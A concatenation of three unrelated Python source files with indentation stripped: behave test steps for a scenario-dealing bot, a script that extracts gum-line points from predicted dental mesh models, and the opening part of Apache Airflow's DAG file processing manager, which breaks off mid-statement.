def restart_the_bot(context):
assert_is_not_none(context.dealer)
config = BotConfiguration()
context.dealer = Dealer(config.banks, config.tests)
@when("the bot's state is saved")
def save_state(context):
context.dealer.save()
assert_in(STATE_PATH, context.sandbox.actual())
@when("the first scenario is dealt")
def first_scenario_is_dealt(context):
assert_equal(0, context.dealt)
if not context.dealer:
config = BotConfiguration()
context.dealer = Dealer(config.banks, config.tests)
try:
context.dealer.deal()
except BotError as error:
context.error = error
context.dealt += 1
@when("a scenario is dealt on {side:Side}")
def scenario_is_dealt_on_side(context, side):
if side not in context.dealer:
load_dealer_on_side(context, side)
original_directory = getcwd()
chdir(context.sandbox[side].path)
try:
context.dealer[side].deal()
except BotError as error:
context.error = error
# Return to original working directory.
chdir(original_directory)
@when("another scenario is dealt")
def another_scenario_is_dealt(context):
assert_is_not_none(context.dealer)
assert_greater(context.dealt, 0)
try:
context.dealer.deal()
except BotError as error:
context.error = error
context.dealt += 1
@then("there are no more scenarios to deal")
def no_more_scenarios(context):
assert_is_none(context.error)
assert_is_not_none(context.dealer)
assert_true(context.dealer.is_done)
|
show_result.py
|
#!/usr/bin/env python
# coding: utf-8
""""
Usage: python show_data.py
"""
# In[1]:
import os
import numpy as np
from scipy import spatial
import glob
from multiprocessing import Process
from tqdm import tqdm
from vedo import load, show, Point
import math
import sys
# ## 一、自定义函数
# ### 1.获取模型信息
# In[2]:
def get_edges(faces):
"""
根据面得到相应的边
@faces: 模型的所有面
return: 模型的边
"""
edge2key = dict()
edges = []
edges_count = 0
for face_id, face in enumerate(faces):
faces_edges = []
for i in range(3):
cur_edge = (face[i], face[(i + 1) % 3])
faces_edges.append(cur_edge)
for idx, edge in enumerate(faces_edges):
edge = tuple(sorted(list(edge)))
if edge not in edge2key:
edge2key[edge] = edges_count
edges_count += 1
edges.append(list(edge))
return edges
def parse_obje(obj_file):
"""
解析obj文件, 获取点,边,面
@obj_file: obj模型文件路径
return: 模型的点,边,面信息
"""
vs = []
faces = []
edges = []
with open(obj_file) as f:
for line in f:
line = line.strip()
splitted_line = line.split()
if not splitted_line:
continue
elif splitted_line[0] == 'v':
vs.append([float(v) for v in splitted_line[1:]])
elif splitted_line[0] == 'f':
try:
faces.append([int(c) - 1 for c in splitted_line[1:]])
except ValueError:
faces.append([int(c.split('/')[0]) - 1 for c in splitted_line[1:]])
elif splitted_line[0] == 'e':
if len(splitted_line) >= 4:
edge_v = [int(c) - 1 for c in splitted_line[1:-1]]
edge_c = int(splitted_line[-1])
edge_v.append(edge_c) # class
edges.append(edge_v)
else:
continue
vs = np.array(vs)
faces = np.array(faces, dtype=int)
# if len(edges) == 0:
# edges = get_edges(faces)
edges = np.array(edges)
return vs, faces, edges
# ### 2.根据边标记对面进行标记
# In[3]:
def label_face_by_edge(faces, edges, edge_labels):
"""
利用边标签对面进行标记
@faces: 模型的面
@edges: 模型的边
@edge_labels: 模型边对应的标签
return: 面的标签
"""
edge_dict = {} # key: str([pt1, pt2]) value: label
for ei, edge in enumerate(edges):
key = tuple(edge)
edge_dict[key] = edge_labels[ei]
# print(edge_dict)
face_labels = np.array(len(faces) * [[-1, -1, -1]])
for i, face in enumerate(faces):
# faces_edges = []
for j in range(3):
cur_edge = [face[j], face[(j + 1) % 3]]
cur_label = edge_dict[tuple(sorted(cur_edge))]
face_labels[i][j] = cur_label
# face_labels.append(faces_edges)
face_labels = np.where(np.sum(face_labels, axis=1) < 2, 1, 2)
optimizer_face_labels(faces, face_labels) # 对面标签进行优化 膨胀操作 填充
return face_labels
def find_neighb_faces(face_id, faces):
face = faces[face_id]
nb_face = []
for i in range(3):
cur_edge = [face[i], face[(i + 1) % 3]]
pt1 = cur_edge[0]
pt2 = cur_edge[1]
face_ids = find_faces_by_2point(faces, pt1, pt2)
if len(face_ids) == 2:
nb_face_id = face_ids[0][0] if face_ids[0][0] != face_id else face_ids[1][0]
nb_face.append(nb_face_id)
return nb_face
def optimizer_face_labels(faces, face_labels):
# new_face_labels = face_labels.copy()
for i, face in enumerate(faces):
nb_faces = find_neighb_faces(i, faces)
nb_labels = []
for face_id in nb_faces:
nb_labels.append(face_labels[face_id])
if len(nb_labels) == 0:
continue
counts = np.bincount(nb_labels)
# 返回众数
if face_labels[i] != np.argmax(counts):
# print("face: {}, label:{} nb_labels: {}, 众数: {}".format(i, face_labels[i], nb_labels, np.argmax(counts)))
face_labels[i] = np.argmax(counts)
# ### 3.利用边对点进行标记
# In[4]:
def label_pts_by_edges(vs, edges, edge_labels):
"""
根据边标签,对点进行标注
@vs: 模型的点
@edge: 模型的边
@edge_labels: 模型边对应的标签
return: 模型点的标签
"""
pts_labels = np.array(len(vs) * [[-1, -1]])
for ei, edge in enumerate(edges):
edge_label = edge_labels[ei]
pt1 = edge[0]
pt2 = edge[1]
pts_labels[pt1][edge_label] = edge_label
pts_labels[pt2][edge_label] = edge_label
return pts_labels
# In[5]:
def find_faces_by_2point(faces, id1, id2):
"""
根据两个点确定以两点所在边为公共边的两个面
@faces: 所有面,N*3, 值表示点的id值
@id1: 第一个点的id值
@id2: 第二个点的id值
return: 2*3, [面的id,第一个点的位置, 第二个点的位置]
"""
p1_faces = np.argwhere(faces == id1) # 行id, 列id
p2_faces = np.argwhere(faces == id2)
intersection_faces = []
for val1 in p1_faces:
for val2 in p2_faces:
if val1[0] == val2[0]:
intersection_faces.append([val1[0], val1[1], val2[1]])
return intersection_faces
# In[6]:
def get_pts_from_edges(edges, threshold=30):
circle_pts = [[]]
count = 0
while len(edges) > 0:
if len(circle_pts[count]) == 0:
circle_pts[count] = list(edges[0])
edges = np.delete(edges, 0, axis=0)
else:
last_id = circle_pts[count][-1]
idx = np.where(edges == last_id)[0]
if len(idx) == 0:
circle_pts.append([])
count += 1
else:
edge = edges[idx[0]]
next_id = edge[0] if edge[0] != last_id else edge[1]
circle_pts[count].append(next_id)
edges = np.delete(edges, idx[0], axis=0)
pts_ids = []
for circle in circle_pts:
# 过滤短的
if len(circle) > threshold:
# print("{}".format(len(circle)))
circle = drop_cycle(circle, threshold) # 去闭环
# print("after drop cycle {}".format(len(circle)))
pts_ids.append(circle)
# TODO 如果len(pts_ids) > 0 需要合并
return pts_ids
def drop_cycle(edge, max_length=20):
"""
删除列表中形成的小闭环
@edge: 原始顶点id
@max_length: 容许闭环的最小长度
return: 输出删除小闭环后的列表
"""
drop_list = []
drop_count = 0
for i, item in enumerate(edge):
if item not in drop_list:
drop_list.append(item)
else:
last_index = len(drop_list) - 1 - drop_list[::-1].index(item)
if i - last_index - drop_count < max_length:
drop_count += len(drop_list[last_index:])
drop_list = drop_list[:last_index+1]
else:
drop_list.append(item)
# 去掉首尾构成的闭环 如: [956 1035 1538 ...... 2028 1035 952 956] ==> 1035->952->956->1035
circle_count = np.where(np.bincount(drop_list) >= 2)[0]
for item in circle_count:
if item == drop_list[0]:
continue
first_id = drop_list.index(item)
last_id = drop_list[::-1].index(item)
if first_id + last_id <= max_length:
length = len(drop_list)
drop_list = drop_list[first_id:length-last_id]
return np.asarray(drop_list)
# def label_pts_by_edges_and_faces(vs, edges, faces, face_labels):
# """
# 根据边和面标签,对点进行标注,一条边对应两个面,如果两个面标签不同,则保留点
# @vs: 模型的点
# @edges: 模型的边
# @faces: 模型的面
# @face_labels: 模型面对应的标签
# return: 模型边界点
# """
# pts_labels = np.array(len(vs) * [False])
# for ei, edge in enumerate(edges):
# pt1 = edge[0]
# pt2 = edge[1]
# face_ids = find_faces_by_2point(faces, pt1, pt2)
# if len(face_ids) == 2:
# if face_labels[face_ids[0][0]] != face_labels[face_ids[1][0]]:
# pts_labels[pt1] = True
# pts_labels[pt2] = True
#
# return vs[pts_labels]
def label_pts_by_edges_and_faces(vs, edges, faces, face_labels):
"""
根据边和面标签,对点进行标注,一条边对应两个面,如果两个面标签不同,则保留点
@vs: 模型的点
@edges: 模型的边
@faces: 模型的面
@face_labels: 模型面对应的标签
return: 模型边界点
"""
# pts_labels = np.array(len(vs) * [False])
edge_idx = []
for ei, edge in enumerate(edges):
pt1 = edge[0]
pt2 = edge[1]
face_ids = find_faces_by_2point(faces, pt1, pt2)
if len(face_ids) == 2:
if face_labels[face_ids[0][0]] != face_labels[face_ids[1][0]]:
edge_idx.append(ei)
test_edges = np.asarray(edges[edge_idx])
pts_ids = get_pts_from_edges(test_edges)
# TODO 如果len(pts_ids) > 0 需要合并(多个闭环)
idx = np.array([], dtype=int)
face_normals, face_areas = compute_face_normals_and_areas(vs, faces) # 计算面的法向量
for pts_id in pts_ids:
# idx = np.append(idx, pts_id)
temp = []
temp.append(pts_id[0])
for i in range(1, len(pts_id) - 1):
last_pt = pts_id[i - 1]
cur_pt = pts_id[i]
next_pt = pts_id[i + 1]
a = vs[last_pt] - vs[cur_pt]
b = vs[next_pt] - vs[cur_pt]
y = a[0] * b[0] + a[1] * b[1] + a[2] * b[2]
x = math.sqrt(a[0] * a[0] + a[1] * a[1] + a[2] * a[2]) * math.sqrt(b[0] * b[0] + b[1] * b[1] + b[2] * b[2])
# 计算三点形成的夹角
theta = math.acos(y / x) / math.pi * 180 # 不存在重合点 所以x可以不用判零
if theta > 50:
curvature = compute_pt_curvature(vs, edges, faces, face_normals, cur_pt)
if max(curvature) > 0:
temp.append(cur_pt)
temp.append(pts_id[-1])
idx = np.append(idx, temp)
return vs[idx]
def compute_face_normals_and_areas(vs, faces):
"""
计算每个面的法向量和面积
"""
face_normals = np.cross(vs[faces[:, 1]] - vs[faces[:, 0]],
vs[faces[:, 2]] - vs[faces[:, 1]])
# >>> deal zero face >>>
zeros_idx = np.argwhere((face_normals[:, 0] == 0) & (face_normals[:, 1] == 0) & (face_normals[:, 2] == 0))
normal_mean = np.mean(face_normals, axis=0)
for idx in zeros_idx:
idx = idx[0]
face_normals[idx] = normal_mean
# print("face_normals_idx: ", face_normals[idx])
# <<< deal zero face <<<
face_areas = np.sqrt((face_normals ** 2).sum(axis=1))
# print("n_faces: ", len(faces), mesh.filename)
face_normals /= face_areas[:, np.newaxis]
assert (not np.any(face_areas[:, np.newaxis] == 0)), "has zero area face!"
face_areas *= 0.5
return face_normals, face_areas
def compute_pt_curvature(vs, edges, faces, face_normals, pt_id):
# Reference: https://doi.org/10.1145/3394486.3403272 CurvaNet
c_ij = []
edge_ids, cur_idxs = np.where(edges == pt_id)
for i, edge_id in enumerate(edge_ids):
cur_pt_id = cur_idxs[i]
point_i = edges[edge_id][cur_pt_id]
point_j = edges[edge_id][1 - cur_pt_id]
normal_i = compute_point_normal(faces, face_normals, point_i)
e_ij = vs[point_j] - vs[point_i]
c_ij.append(2 * normal_i.dot(e_ij / (np.sqrt((e_ij ** 2).sum()) + sys.float_info.epsilon)))
return c_ij
def compute_point_normal(faces, face_normals, point_id):
face_ids = get_faces_by_point(faces, point_id)
normal_sum = face_normals[face_ids].sum(0) # 按行相加
normal_div = np.sqrt((normal_sum ** 2).sum())
normal = normal_sum / (normal_div + sys.float_info.epsilon)
return normal
def get_faces_by_point(faces, point_id):
point_faces = np.argwhere(faces == point_id)
face_ids = point_faces[:, 0]
return face_ids
# ### 4.边标签投影到原始模型
# In[7]:
def label_origin_edge(predict_edges, predict_labels, predict_vs, origin_edges, origin_vs):
"""
根据预测的边及标签,对原始模型的边进行标注
@predict_edges: 预测模型对应的边
@predict_labels: 预测模型对应的标签
@origin_edges: 原始模型的边
return: 原始模型边对应的标签
"""
predict_edge_pts = predict_vs[predict_edges].reshape(-1, 6)
tree = spatial.KDTree(predict_edge_pts)
origin_edge_pts = origin_vs[origin_edges].reshape(-1, 6)
origin_labels = []
for i, edge in enumerate(origin_edge_pts):
# if i % 50000 == 0:
# print(i, "is finded!")
dist, idx = tree.query(edge)
origin_labels.append(predict_labels[idx])
return origin_labels
# ### 5.点投影到原模型
# In[8]:
def project_points(predict_pts, origin_vs):
"""
根据预测的边,筛选出边界点,将点投影回原模型
@predict_pts: 边界点
@origin_vs: 原始模型所有点
return: 返回原始模型的边界点
"""
tree = spatial.KDTree(origin_vs)
origin_pts = []
for i, pt in enumerate(predict_pts):
dist, idx = tree.query(pt)
origin_pts.append(origin_vs[idx])
origin_pts = np.asarray(origin_pts)
return origin_pts
# ### 6.分开保存模型 便于显示
# In[9]:
def save_model_part(save_path, vs, faces, face_labels, model1_name="mesh1.obj", model2_name="mesh2.obj"):
"""
根据标签将模型标记的部分分别保存
@obj_vs: 模型的顶点
@obj_faces: 模型的面
@face_labels: 面的标签
return: None
"""
mesh1 = open(os.path.join(save_path, model1_name), "w")
mesh2 = open(os.path.join(save_path, model2_name), "w")
for v in vs:
mesh1.write("v " + str(v[0]) + " " + str(v[1]) + " " + str(v[2]) + "\n")
mesh2.write("v " + str(v[0]) + " " + str(v[1]) + " " + str(v[2]) + "\n")
for idx, face in enumerate(faces):
if face_labels[idx] == 1:
mesh1.write("f " + str(face[0]+1) + " " + str(face[1]+1) + " " + str(face[2]+1) + "\n")
if face_labels[idx] == 2:
mesh2.write("f " + str(face[0]+1) + " " + str(face[1]+1) + " " + str(face[2]+1) + "\n")
mesh1.close()
mesh2.close()
# ### 7. 导出边界点
# In[10]:
def save_pts_to_vtk(pts, save_path="./test.vtk"):
"""
将牙龈点pts格式转为vtk格式
@pts: 点集 [[x, y, z], [x, y, z], ...]
@save_path: 保存路径
return: None
"""
import vtkplotter as vtkp
vtk_point = vtkp.Points(pts.reshape(-1, 3))
vtkp.write(vtk_point, save_path, binary=False)
# print("vtk file is saved in ", save_path)
# ## 二、主函数
#
# In[12]:
def save_predict(predict_model, predict_path):
"""
对预测的模型进行分析,找出牙龈线点,并对原始模型进行分割
@predict_model: 预测的模型
@save_path: 结果保存路径
return: None
"""
# ------加载模型 获取信息------
# ## 预测模型
predict_vs, predict_faces, predict_edges = parse_obje(predict_model)
if len(predict_edges) == 0:
print("{} is no result!".format(predict_model))
return
origin_model_basename = os.path.basename(predict_model)[:-6]
save_path = os.path.join(predict_path, origin_model_basename)
if not os.path.exists(save_path):
os.makedirs(save_path)
predict_labels = predict_edges[:, -1]
predict_edges = predict_edges[:, :-1]
# ## 标记预测的面
predict_face_labels = label_face_by_edge(predict_faces, predict_edges, predict_labels)
save_model_part(save_path, predict_vs, predict_faces, predict_face_labels, "predict1.obj", "predict2.obj")
# ------处理预测模型------
# # 方案一 直接通过边解析点
# predict_pts_labels = label_pts_by_edges(predict_vs, predict_edges, predict_labels)
# predict_gum_pt_ids = np.where((predict_pts_labels[:,0]==0) & (predict_pts_labels[:,1]==1))[0]
# predict_gum_pts = predict_vs[predict_gum_pt_ids]
# print("predict_gum_pts: ", len(predict_gum_pts))
# save_pts_to_vtk(predict_gum_pts, os.path.join(save_path, "predict.vtk"))
# ## 方案二 通过面的标签来判断
predict_gum_pts = label_pts_by_edges_and_faces(predict_vs, predict_edges, predict_faces, predict_face_labels)
# print("predict_gum_pts: ", len(predict_gum_pts))
np.savetxt(os.path.join(save_path, "predict.pts"), predict_gum_pts)
save_pts_to_vtk(predict_gum_pts, os.path.join(save_path, "predict.vtk"))
# ## 三、批量处理
# In[15]:
def show_predict_batch(predict_model_list, predict_path):
"""
批量处理预测模型
@predict_model_list: 预测的模型列表
@predict_path: 预测模型存放路径
return: None
"""
for i, predict_model in enumerate(tqdm(predict_model_list)):
try:
save_predict(predict_model, predict_path)
except KeyError:
print("predict_model: ", predict_model)
except Exception as e:
raise e
# In[16]:
def parallel_show_predict(model_list, predict_path, n_workers=8):
"""
多进程处理
"""
if len(model_list) < n_workers:
n_workers = len(model_list)
chunk_len = len(model_list) // n_workers
chunk_lists = [model_list[i:i+chunk_len] for i in range(0, (n_workers-1)*chunk_len, chunk_len)]
chunk_lists.append(model_list[(n_workers - 1)*chunk_len:])
process_list = [Process(target=show_predict_batch, args=(chunk_list, predict_path, )) for chunk_list in chunk_lists]
for process in process_list:
process.start()
for process in process_list:
process.join()
# In[17]:
def show_predict(predict1, predict2, pts, max_dist_pts=None):
"""
显示预测结果
@predict1: 牙齿部分
@predict2: 牙龈部分
@pts: 牙龈线点
return: None
"""
a = load(predict1).c(('blue'))
b = load(predict2).c(('magenta'))
c = load(pts).pointSize(10).c(('green'))
if max_dist_pts:
p1 = Point(max_dist_pts, r=20, c='yellow')
show(a, b, c, p1)
else:
show(a, b, c)
if __name__ == "__main__":
predict_dir = "/home/heygears/work/predict_results"
# 解析结果
predict_model_list = glob.glob(os.path.join(predict_dir, "*.obj"))
parallel_show_predict(predict_model_list, predict_dir, n_workers=8)
# 显示结果
file_list = [os.path.join(predict_dir, file_path) for file_path in os.listdir(predict_dir)
if os.path.isdir(os.path.join(predict_dir, file_path))]
for i, file in enumerate(file_list):
print("{} file path is: {}".format(i + 1, file))
predict1_path = os.path.join(file, "predict1.obj")
predict2_path = os.path.join(file, "predict2.obj")
predict_pts = os.path.join(file, "predict.vtk")
show_predict(predict1_path, predict2_path, predict_pts)
# ----- 按键控制 --------
# length = len(file_list)
# i = 0
# while True:
# file = file_list[i]
# print("\n第{}个 file path is: {}".format(i + 1, file))
# predict1_path = os.path.join(file, "predict1.obj")
# predict2_path = os.path.join(file, "predict2.obj")
# predict_pts = os.path.join(file, "predict.vtk")
# show_predict(predict1_path, predict2_path, predict_pts)
#
# print("*****A(a):上一张; D(d):下一张; Q(q):退出; 按完键后回车表示确定!!!")
# line = sys.stdin.readline()
# if line == "a\n" or line == "A\n":
# if i > 0:
# i -= 1
# else:
# print("已经到最前面一张了,请按D(d)到下一张,按Q(q)退出")
# i = 0
# if line == "d\n" or line == "D\n":
# if i < length - 1:
# i += 1
# else:
# print("已经到最后面一张了,请按A(a)到下一张,按Q(q)退出")
# i = length - 1
# if line == "q\n" or line == "Q\n":
# break
|
manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import inspect
import logging
import multiprocessing
import os
import random
import signal
import sys
import time
import zipfile
from collections import defaultdict
from datetime import datetime, timedelta
from importlib import import_module
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import TYPE_CHECKING, Any, Dict, List, NamedTuple, Optional, Union, cast
from setproctitle import setproctitle
from sqlalchemy.orm import Session
from tabulate import tabulate
import airflow.models
from airflow.callbacks.callback_requests import CallbackRequest
from airflow.configuration import conf
from airflow.dag_processing.processor import DagFileProcessorProcess
from airflow.models import DagModel, DbCallbackRequest, errors
from airflow.models.serialized_dag import SerializedDagModel
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.file import list_py_file_paths, might_contain_dag
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.net import get_hostname
from airflow.utils.process_utils import kill_child_processes_by_pids, reap_process_group
from airflow.utils.session import NEW_SESSION, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
if TYPE_CHECKING:
import pathlib
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: Optional[datetime]
last_duration: Optional[float]
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_RUN_ONCE = 'agent_run_once'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin, MultiprocessingStartMethodMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:param processor_timeout: How long to wait before timing out a DAG file processor
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:param pickle_dags: whether to pickle DAGs.
:param async_mode: Whether to start agent in async mode
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
):
super().__init__()
self._file_path_queue: List[str] = []
self._dag_directory: str = dag_directory
self._max_runs = max_runs
self._processor_timeout = processor_timeout
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._async_mode = async_mode
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
# Pipe for communicating signals
self._process: Optional[multiprocessing.process.BaseProcess] = None
self._done: bool = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn: Optional[MultiprocessingConnection] = None
self._last_parsing_stat_received_at: float = time.monotonic()
def start(self) -> None:
"""Launch DagFileProcessorManager processor and start DAG parsing loop in manager."""
mp_start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(mp_start_method)
self._last_parsing_stat_received_at = time.monotonic()
self._parent_signal_conn, child_signal_conn = context.Pipe()
process = context.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
self._processor_timeout,
child_signal_conn,
self._dag_ids,
self._pickle_dags,
self._async_mode,
),
)
self._process = process
process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", process.pid)
def run_single_parsing_loop(self) -> None:
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._parent_signal_conn or not self._process:
raise ValueError("Process not started.")
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_RUN_ONCE)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def get_callbacks_pipe(self) -> MultiprocessingConnection:
"""Returns the pipe for sending Callbacks to DagProcessorManager."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
return self._parent_signal_conn
def wait_until_finished(self) -> None:
"""Waits until DAG parsing is finished."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._async_mode:
raise RuntimeError("wait_until_finished should only be called in sync_mode")
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
return
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode (which is the only time we call this function) we don't send this message from
# the Manager until all the running processors have finished
return
@staticmethod
def _run_processor_manager(
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
) -> None:
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
# TODO: This reloading should be removed when we fix our logging behaviour
# In case of "spawn" method of starting processes for multiprocessing, reinitializing of the
# SQLAlchemy engine causes extremely unexpected behaviour of messing with objects already loaded
# in a parent process (likely via resources shared in memory by the ORM libraries).
# This caused flaky tests in our CI for many months and has been discovered while
# iterating on https://github.com/apache/airflow/pull/19860
# The issue that describes the problem and possible remediation is
# at https://github.com/apache/airflow/issues/19934
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0])) # type: ignore
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(
dag_directory=dag_directory,
max_runs=max_runs,
processor_timeout=processor_timeout,
dag_ids=dag_ids,
pickle_dags=pickle_dags,
signal_conn=signal_conn,
async_mode=async_mode,
)
processor_manager.start()
def heartbeat(self) -> None:
"""Check if the DagFileProcessorManager process is alive, and process any pending messages"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
raise RuntimeError(f"Unexpected message received of type {type(message).__name__}")
def _heartbeat_manager(self):
"""Heartbeat DAG file processor and restart it if we are not done."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid,
self._process.exitcode,
)
self.start()
if self.done:
return
parsing_stat_age = time.monotonic() - self._last_parsing_stat_received_at
if parsing_stat_age > self._processor_timeout.total_seconds():
Stats.incr('dag_processing.manager_stalls')
self.log.error(
"DagFileProcessorManager (PID=%d) last sent a heartbeat %.2f seconds ago! Restarting it",
self._process.pid,
parsing_stat_age,
)
reap_process_group(self._process.pid, logger=self.log)
self.start()
def _sync_metadata(self, stat):
"""Sync metadata from stat queue and only keep the latest stat."""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
self._last_parsing_stat_received_at = time.monotonic()
@property
def done(self) -> bool:
"""Has DagFileProcessorManager ended?"""
return self._done
@property
def all_files_processed(self):
"""Have all files been processed at least once?"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
# Give the Manager some time to cleanly shut down, but not too long, as
# it's better to finish sooner than wait for (non-critical) work to
# finish
self._process.join(timeout=1.0)
reap_process_group(self._process.pid, logger=self.log)
self._parent_signal_conn.close()
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:param processor_timeout: How long to wait before timing out a DAG file processor
:param signal_conn: connection to communicate signal with processor agent.
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:param pickle_dags: whether to pickle DAGs.
:param async_mode: whether to start the manager in async mode
"""
def __init__(
self,
dag_directory: Union[str, "pathlib.Path"],
max_runs: int,
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
signal_conn: Optional[MultiprocessingConnection] = None,
async_mode: bool = True,
):
super().__init__()
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
# signal_conn is None for dag_processor_standalone mode.
self._direct_scheduler_conn = signal_conn
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._async_mode = async_mode
self._parsing_start_time: Optional[int] = None
# Set the signal conn in to non-blocking mode, so that attempting to
# send when the buffer is full errors, rather than hangs for-ever
# attempting to send (this is to avoid deadlocks!)
#
# Don't do this in sync_mode, as we _need_ the DagParsingStat sent to
# continue the scheduler
if self._async_mode and self._direct_scheduler_conn is not None:
os.set_blocking(self._direct_scheduler_conn.fileno(), False)
self._parallelism = conf.getint('scheduler', 'parsing_processes')
if (
conf.get_mandatory_value('database', 'sql_alchemy_conn').startswith('sqlite')
and self._parallelism > 1
):
self.log.warning(
"Because we cannot use more than 1 thread (parsing_processes = "
"%d) when using sqlite. So we set parallelism to 1.",
self._parallelism,
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler', 'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler', 'print_stats_interval')
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = 0
# Last time we cleaned up DAGs which are no longer in files
self.last_deactivate_stale_dags_time = timezone.make_aware(datetime.fromtimestamp(0))
# How often to check for DAGs which are no longer in files
self.deactivate_stale_dags_interval = conf.getint('scheduler', 'deactivate_stale_dags_interval')
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler', 'dag_dir_list_interval')
# Mapping file name and callbacks requests
self._callback_to_execute: Dict[str, List[CallbackRequest]] = defaultdict(list)
self._log = logging.getLogger('airflow.processor_manager')
self.waitables: Dict[Any, Union[MultiprocessingConnection, DagFileProcessorProcess]] = (
{
